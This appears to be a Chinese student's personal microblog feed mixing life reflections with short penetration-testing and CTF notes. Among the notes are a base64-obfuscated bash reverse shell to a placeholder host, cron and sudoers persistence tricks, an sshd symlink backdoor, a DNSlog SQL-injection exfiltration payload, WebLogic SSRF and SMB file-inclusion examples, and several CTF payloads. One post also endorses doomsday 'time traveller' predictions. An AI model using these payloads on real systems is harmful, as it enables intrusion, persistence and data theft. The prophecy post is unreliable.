yuaneuro 喜欢钢琴和赛车

    yuaneuro April 21st, 2021 at 12:12 am

    可进行利用的cron有如下几个地方:

    /etc/crontab 这个是肯定的 /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。 /var/spool/cron/root centos系统下root用户的cron文件 /var/spool/cron/crontabs/root debian系统下root用户的cron文件
    yuaneuro April 19th, 2021 at 11:54 pm

    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

    yuaneuro April 17th, 2021 at 01:30 pm
    此条为私密说说,仅发布者可见
    yuaneuro April 14th, 2021 at 12:57 pm

    给普通用户赋予速sudo权限
    echo "xxx ALL=(ALL) ALL" >> /etc/sudoers

    yuaneuro April 12th, 2021 at 04:29 pm

    shiro 反序列化漏洞
    在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。

    那么,Payload产生的过程:
    命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值

    利用工具 ShiroScan

    yuaneuro April 3rd, 2021 at 10:14 pm

    python伪终端
    python -c "import pty;pty.spawn('/bin/bash')"

    yuaneuro April 2nd, 2021 at 05:50 pm

    weblogic SSRF漏洞
    http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

    yuaneuro March 15th, 2021 at 09:24 pm

    dnslog
    1.SQL注入中的盲注
    2.无回显的命令执行
    3.无回显的SSRF
    例如:1‘ and load_file(concat(‘\\’,(select database()),’.xtftm5.ceye.io\sql’))–+

    yuaneuro February 8th, 2021 at 10:56 pm

    传值赋值:变量默认总是传值赋值。那也就是说,当将一个表达式的值赋予一个变量时,整个原始表达式的值被赋值到目标变量。这意味着,例如,当一个变量的值赋予另外一个变量时,改变其中一个变量的值,将不会影响到另外一个变量。
    引用赋值:PHP 也提供了另外一种方式给变量赋值:引用赋值。这意味着新的变量简单的引用(换言之,“成为其别名” 或者 “指向”)了原始变量。改动新的变量将影响到原始变量,反之亦然。

    yuaneuro January 31st, 2021 at 05:42 pm

    [GYCTF2020]Blacklist

    HANDLER ... OPEN语句打开一个表,
    使其可以使用后续HANDLER ... READ语句访问,
    该表对象未被其他会话共享,
    并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

    payload:1';
    HANDLER FlagHere OPEN;
    HANDLER FlagHere READ FIRST;
    HANDLER FlagHere CLOSE;#

    yuaneuro January 28th, 2021 at 01:31 am

    ]P2P内网穿透,大流量低延迟,内网穿透工具nps

    yuaneuro January 27th, 2021 at 11:46 am

    可以使用smb共享来绕过php远程文件包含的限制。
    当“allow_url_fopen”和“allow_url_include”设置为“Off”,而且smb为匿名服务器,可通过xxx.com/page.php?file=\192.168.x.x\shell.php进行远程文件包含

    yuaneuro January 17th, 2021 at 02:02 pm

    steghide extract -sf moon.jpg

    yuaneuro January 11th, 2021 at 09:24 pm
    yuaneuro January 11th, 2021 at 12:48 am

    php5.5.9 漏洞在于PHP的数组下标的一个BUG,可以利用【整型溢出】

    用inode索引节点,先使用ls -i命令寻找flag的inode号 ls -i /
    payload:stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum 38406195`

    (tac:从最后一行倒序显示内容,并将所有内容输入)
    (注意:这里使用hackbar无法得到结果,因为浏览器会自动在换行符%0a前面加上回车符%0d,凑成%0d%0a,使绕过失败。)
    --favorite_number

    yuaneuro January 11th, 2021 at 12:18 am

    通过@构造payload读取文件

    yuaneuro January 10th, 2021 at 02:09 pm

    私有变量(protected变量应该也会)在进行序列化之后的字符串开头结尾各有一个空白字符(即%00)
    --攻防世界Web_php_unserialize

    yuaneuro January 7th, 2021 at 02:01 pm

    首先测试所有的截断符号:
    ‘$’
    ‘;’
    ‘|’
    ‘-’
    ‘(’
    ‘)’
    ‘反引号’
    ‘||’
    ‘&&’
    ‘&’
    ‘}’
    ‘{’
    '%0a’可以当作空格来用;
    利用截断符号配合普通命令

    yuaneuro January 7th, 2021 at 01:49 pm

    long long int最大值9223372036854775807,int最大值2147438647
    当超过这个最大值时就会发生数据溢出,数据溢出后变成负数就绕过了

    yuaneuro January 7th, 2021 at 01:49 pm

    两个is_numeric进行判断并且用and连接时,and后面的is_numeric无论判断的是不是数字皆可以绕过。

    yuaneuro January 6th, 2021 at 02:19 pm
    yuaneuro December 16th, 2020 at 10:23 pm

    wireshark过滤DHCP使用bootp过滤

    yuaneuro December 14th, 2020 at 02:14 pm

    HTTP/2虽然解决了HTTP队头问题,但是对于TCP队头阻塞的问题却无能为力,因为TCP是可靠传输,如果其中某一个数据包没有按照顺序到达,接收端就会一直等待,这就是TCP队头阻塞

    yuaneuro November 27th, 2020 at 03:20 pm

    [护网杯 2018]easy_tornado
    模板注入msg={{handler.settings}}

    yuaneuro October 3rd, 2020 at 04:10 pm

    文件上传可以先上传一个图片,里面写入file_put_contents()生成的一句话一句话,然后再利用文件包含include包含该文件即可生成一句话

    yuaneuro September 20th, 2020 at 12:04 am

    我要闷声发大财

    yuaneuro September 14th, 2020 at 11:11 am

    ssh软连接后门
    ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345建立sshd的软连接

    yuaneuro August 30th, 2020 at 03:15 am

    刚开始看netflix感觉一个很不舒服的地方就是没有调节清晰度的地方,刚开始用apple music感觉没有评论及选择音质的地方很不习惯,以及刚开始用微信的时候没有花里胡哨的气泡的装饰 。但用的久了,你发现你根本不需要这些,打开音乐软件只想安安静静听歌 打开微信只是为了支付和聊天,看视频的网络好了就看超清,网速慢也只能看标清,似乎我更喜欢把东西做的更简单而又不是本质。

    yuaneuro July 21st, 2020 at 01:48 am

    可以先去创业公司,待半年锻炼锻炼,然后跳槽去大公司

    yuaneuro July 21st, 2020 at 01:24 am

    在进程池中如果代码出现异常不会报错

    yuaneuro June 30th, 2020 at 02:17 am

    adsense又申请成功了

    yuaneuro May 27th, 2020 at 09:07 am

    ffifdyop 经过md5加密后:276f722736c95d99e921722cf9ed621c 再转换为字符串:'or'6<乱码>  即  'or'66�]��!r,��b   用途: select from admin where password=''or'6<乱码>' 就相当于select from admin where password=''or 1  实现sql注入

    yuaneuro May 18th, 2020 at 11:12 am

    可以往回看,但别往回走

    yuaneuro May 10th, 2020 at 03:01 am

    用于解决复杂问题的步骤,成为算法

    yuaneuro May 9th, 2020 at 01:29 am

    我太菜了

    yuaneuro April 25th, 2020 at 12:08 am

    我还是更相信kfk说的

    到目前为止他说对了很多事

    从2020年到现在,真的和KFK说的一样,

    我开始感受到2019年是值得回忆的一年。

    他之前说过朝鲜有变动,现在估计也差不多了

    KFK建议人们现在选择一条进化心灵的方法,做好未来悲惨世界的准备。我认为这一条尤为重要。

    YJ昨天也发推了说他们原来跟踪的时间线已经从a变到b

    这也是能解释他们为什么有些说的不准确

    yuaneuro April 23rd, 2020 at 02:37 am

    在平淡的日子里,你要有勇气挑去生活的刺

    yuaneuro April 13th, 2020 at 02:45 am

    会遗憾的不是因为有些事没做, 而是因为有些事再也没机会做了。

    yuaneuro April 7th, 2020 at 08:22 pm

    没有人喜欢孤独,只是不喜欢失望罢了。 —村上春树

    yuaneuro April 6th, 2020 at 02:12 pm

    13天收录26个页面,百度也还是可以的

    yuaneuro April 2nd, 2020 at 02:47 am

    今天是我生日!

    yuaneuro April 1st, 2020 at 03:09 am

    建站一周多就被百度收录3个页面,不错了

    yuaneuro March 30th, 2020 at 02:27 pm

    网课就是直播不想听,课后二倍速看回放

    yuaneuro March 28th, 2020 at 01:55 am

    所以,找到利用负能量的方式,会更实在一点,而衡量“利用”和“被利用”的标准,不是当下的情绪,而是之后的努力,所以,再下一次感到难过,羞耻,愤怒的时候,别让这份能量随着眼泪流走,毕竟,能量的意义不在于正负,而在于让你前行。

    yuaneuro March 17th, 2020 at 01:28 am

    其实遗憾就想生命中的一场雨,你要做的不是呵斥天空让它停止,而是接受“今天下雨了”这个事实,然后打开伞,不是接受它,也不是抵抗它,而是用一种不继续伤害自己的方式与它相处。

    yuaneuro March 13th, 2020 at 04:10 am

    4点10分,外面下雪了,我失眠了

    yuaneuro March 11th, 2020 at 05:27 pm

    网站备案好慢

    yuaneuro March 7th, 2020 at 12:37 am

    原来这个世界上最遗憾的事,是当试图徒弥补一个遗憾的时候,却让另一个遗憾出现了。可能一直以来我们都对遗憾有误解,它存在的意义,不是等着被弥补,而是提醒我们,珍惜眼前人。

    yuaneuro March 7th, 2020 at 12:31 am

    遗憾是用来弥补的,不是用来内疚的

    yuaneuro March 6th, 2020 at 03:19 pm

    简书对手机端的的用户越来越来辣鸡了,兼职不能打开,一打开就跳转到广告页面伴随一声长振动,大半夜玩手机吓我一跳,网页还返回不了,真牛逼!

    yuaneuro March 6th, 2020 at 03:14 pm

    test

Contact information
  • 1280920616@qq.com
  • 1280920616

About me

  • 一个爱好钢琴,喜欢玩赛车游戏,热爱网络安全的普通大三学生